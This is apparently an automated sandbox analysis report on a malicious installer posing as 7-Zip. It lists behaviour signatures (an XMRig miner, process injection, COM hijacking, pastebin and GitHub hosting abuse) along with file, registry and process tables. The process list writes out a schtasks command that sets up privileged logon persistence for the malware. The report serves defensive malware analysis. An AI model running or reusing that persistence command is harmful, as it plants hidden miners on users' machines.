Analysis Overview
SHA256
6220bbe6c26d87fc343e0ffa4e20ccfafeca7dab2742e41963c40b56fb884807
Threat Level: Known bad
The file 7z2406-x64.exe was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Drops file in Drivers directory
Loads dropped DLL
Executes dropped EXE
Event Triggered Execution: Component Object Model Hijacking
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
NSIS installer
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Opens file in notepad (likely ransom note)
Checks processor information in registry
Runs net.exe
Modifies registry class
Suspicious behavior: LoadsDriver
Scheduled Task/Job: Scheduled Task
NTFS ADS
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-18 11:58
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-18 11:58
Reported
2024-06-18 12:28
Platform
win10-20240404-en
Max time kernel
140s
Max time network
1797s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\npf.sys | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Launch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\~ZY8D28.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Services.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\wpcap.dll | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
| File created | C:\Windows\SysWOW64\pthreadVC.dll | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
| File created | C:\Windows\SysWOW64\Packet.dll | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
| File created | C:\Windows\system32\wpcap.dll | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
| File created | C:\Windows\system32\Packet.dll | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5388 set thread context of 5140 | N/A | C:\Users\Admin\AppData\Local\Temp\Services.exe | C:\Windows\explorer.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\7-Zip\7z.exe | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ba.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ms.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\readme.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\he.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\lv.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.sfx | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ka.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sq.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nb.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sa.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tt.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tr.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\License.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\es.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\hu.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tk.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ps.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zG.exe | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip.chm | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\co.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\hi.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fur.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\uz-cyrl.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.dll | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\el.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mk.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sl.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pt.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mr.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File created | C:\Program Files (x86)\WinPcap\rpcapd.exe | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\br.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\kab.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ky.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\vi.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\id.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ku.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nn.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nl.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\be.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\da.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ga.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\et.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fi.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ro.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ru.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sw.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\yo.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ast.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\gu.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pa-in.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ug.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WinPcap\WinPcapInstall.dll | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ext.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ku-ckb.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ne.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\az.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\zh-cn.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\af.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\eu.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\va.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\zh-tw.txt | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
Enumerates physical storage devices
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FE5451A1-ABFE-BF4F-EAFE-000000EEB7C0} | C:\Users\Admin\Desktop\Launch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\RDP-pack.rar:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\1.txt:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\1(1).txt:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\WinPcap_4_1_3.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\~ZY8D28.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\~ZY8D28.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\~ZY8D28.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Services.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Services.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Services.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe
"C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2964.0.1626310130\372903127" -parentBuildID 20221007134813 -prefsHandle 1700 -prefMapHandle 1676 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e6d4c97-5b23-4396-8b80-a1c0c229d3a6} 2964 "\\.\pipe\gecko-crash-server-pipe.2964" 1780 19430eea358 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2964.1.890857067\660443643" -parentBuildID 20221007134813 -prefsHandle 2124 -prefMapHandle 2120 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77f69470-d010-4c2a-8ea4-819811ee1473} 2964 "\\.\pipe\gecko-crash-server-pipe.2964" 2136 19425c72b58 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2964.2.1185248390\550606671" -childID 1 -isForBrowser -prefsHandle 2852 -prefMapHandle 2812 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {55b97035-2ac8-4088-a2dd-07c78c644307} 2964 "\\.\pipe\gecko-crash-server-pipe.2964" 2948 19434e9eb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2964.3.4374042\1750105378" -childID 2 -isForBrowser -prefsHandle 3472 -prefMapHandle 3480 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1d29ebbb-531e-4fe1-b2aa-f259fd48ce86} 2964 "\\.\pipe\gecko-crash-server-pipe.2964" 3488 194344a4358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2964.4.141012846\1740624742" -childID 3 -isForBrowser -prefsHandle 4196 -prefMapHandle 4192 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {796b62a1-f8eb-43fc-8402-95f8c1dfcf15} 2964 "\\.\pipe\gecko-crash-server-pipe.2964" 4208 19435eab558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2964.5.1099174611\815760432" -childID 4 -isForBrowser -prefsHandle 4828 -prefMapHandle 4812 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {64d036ae-dd64-4953-9851-0d8e7f0790c7} 2964 "\\.\pipe\gecko-crash-server-pipe.2964" 4836 19425c60158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2964.6.1882172717\500009994" -childID 5 -isForBrowser -prefsHandle 4924 -prefMapHandle 4928 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff044537-e364-4199-92f9-e07cd6219e54} 2964 "\\.\pipe\gecko-crash-server-pipe.2964" 4916 19437224858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2964.7.702498093\1243274982" -childID 6 -isForBrowser -prefsHandle 5116 -prefMapHandle 5124 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ad226755-ea25-4d83-8c37-add8fbffbaa9} 2964 "\\.\pipe\gecko-crash-server-pipe.2964" 4836 194372fcf58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2964.8.1500643994\1801823518" -childID 7 -isForBrowser -prefsHandle 5480 -prefMapHandle 2780 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {649a7c60-5ed3-4a7c-9943-ca9fac6bdfe1} 2964 "\\.\pipe\gecko-crash-server-pipe.2964" 5508 19433632258 tab
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\RDP-pack.rar"
C:\Users\Admin\Desktop\Launch.exe
"C:\Users\Admin\Desktop\Launch.exe"
C:\Users\Admin\AppData\Local\Temp\~ZY8D28.tmp
C:\Users\Admin\AppData\Local\Temp\~ZY8D28.tmp
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Users\Admin\AppData\Local\Temp\Services.exe
"C:\Users\Admin\AppData\Local\Temp\Services.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
C:\Windows\system32\schtasks.exe
